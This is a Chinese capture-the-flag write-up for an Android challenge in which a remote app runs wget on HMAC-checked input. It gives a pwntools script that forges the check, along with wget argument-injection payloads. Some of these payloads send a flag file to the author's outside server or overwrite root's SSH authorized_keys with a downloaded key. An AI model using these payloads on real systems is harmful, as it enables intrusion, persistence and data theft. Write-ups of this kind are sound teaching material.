>
>
xctf高校战疫-安卓GetFlagwp
Frank
GetFlag
➜ assets cat secret.txt | base64 -D
The%20IP%20of%20the%20remote%20phone%20is%20212.64.66.177%
➜ assets ping 212.64.66.177
PING 212.64.66.177 (212.64.66.177): 56 data bytes
64 bytes from 212.64.66.177: icmp_seq=0 ttl=48 time=82.547 ms
64 bytes from 212.64.66.177: icmp_seq=1 ttl=48 time=34.481 ms
^C
--- 212.64.66.177 ping statistics ---
2 packets transmitted, 2 packets received, 0.0% packet loss
round-trip min/avg/max/stddev = 34.481/58.514/82.547/24.033 ms
➜ assets curl 212.64.66.177:8080
46502
remote apk上跑了一个MainActivity$ServerSocket_thread类
启动以后会监听8080端口,每次接受一个json字符串,以一个随机数.toString()为nonce对"message" 进行 hmacsha1 hash,和check比对后输出
这个key是每次连上去以后才下发的
人家给了个wget,也就是说要拼接一下
from pwn import remote
def make_digest(message, key):
key = bytes(key, 'UTF-8')
message = bytes(message, 'UTF-8')
digester = hmac.new(key, message, hashlib.sha1)
return digester.hexdigest()
def execute(cmd): # getRuntime().exec("wget "+cmd);
payload = {'message': cmd}
x = remote('212.64.66.177', 8080)
payload['check'] = make_digest(payload['message'], str(int(x.recv().decode())))
x.sendline(json.dumps(payload))
x.close()
用了几个办法,都是本地AC,提交RE
--execute output_document=/root/.ssh/authorized_keys http://v4w.frankli.site:1234/id_rsa.pub
--post-file flag http://v4w.frankli.site:1345/
--execute base=http://v4w.frankli.site:1234/ -i flag
上述最后一种办法是可以读文件的,但是不知道flag的路径
比如可以读/default.prop
以上几个payload都能读
/data/data/com.xuanxuan.getflag/files/flag
flag{this_wget_is_from_termux_and_I_move_some_dynamic_lib_to_systemlib_to_run_it}
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论